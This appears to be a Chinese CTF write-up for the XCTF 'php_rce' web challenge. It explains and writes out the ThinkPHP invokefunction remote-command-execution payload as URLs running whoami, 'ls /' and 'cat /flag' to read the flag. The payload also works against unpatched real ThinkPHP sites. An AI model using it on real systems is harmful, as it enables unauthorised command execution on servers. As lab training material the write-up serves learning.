88.[4]攻防世界 web php_rce

之前做过,回顾(看了眼之前的wp,跟没做过一样)

属于远程命令执行漏洞

在 PHP 里,system()exec()shell_exec()、反引号(`)等都可用于执行系统命令。

直接访问index.php没效果

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
  • s=index/think\app/invokefunction :这部分指定了要调用的控制器和方法。在 ThinkPHP 框架里,路由解析机制允许通过这种方式指定要执行的操作,攻击者利用这个特性来调用框架内部的 invokefunction 方法。
  • function=call_user_func_arraycall_user_func_array 是 PHP 的一个内置函数,它能够以数组形式传递参数来调用指定的函数。攻击者利用此函数来动态调用其他函数。
  • vars[0]=system :这里将 system 作为要调用的函数名。system 是 PHP 中用于执行系统命令的函数。
  • vars[1][]=whoami :这是传递给 system 函数的参数,也就是要执行的系统命令。whoami 命令的作用是显示当前系统用户的名称。
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

ls / 用于列出根目录(/)下的所有文件和文件夹。

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

cat 用于查看文件内容。

相关推荐
逻极2 小时前
Python MySQL防SQL注入实战:从字符串拼接的坑到参数化查询的救赎
python·mysql·安全·sql注入
Fnetlink13 小时前
中小企业网络环境优化与安全建设
网络·安全·web安全
拍客圈4 小时前
宝塔 安全风险 修复
安全
门思科技4 小时前
企业级 LoRaWAN 网关远程运维方案对比:VPN 与 NPS FRP 的技术与安全差异分析
运维·网络·安全
文刀竹肃4 小时前
DVWA -SQL Injection-通关教程-完结
前端·数据库·sql·安全·网络安全·oracle
Neolnfra4 小时前
任意文件下载漏洞
计算机网络·安全·web安全·网络安全·系统安全·安全威胁分析·安全架构
tap.AI8 小时前
AI时代的云安全(四)云环境中AI模型的安全生命周期管理实践
人工智能·安全
光影少年8 小时前
web端安全问题有哪些?
前端·安全
测试人社区-千羽9 小时前
AR/VR应用测试核心要点与实施策略
人工智能·安全·职场和发展·自动驾驶·测试用例·ar·vr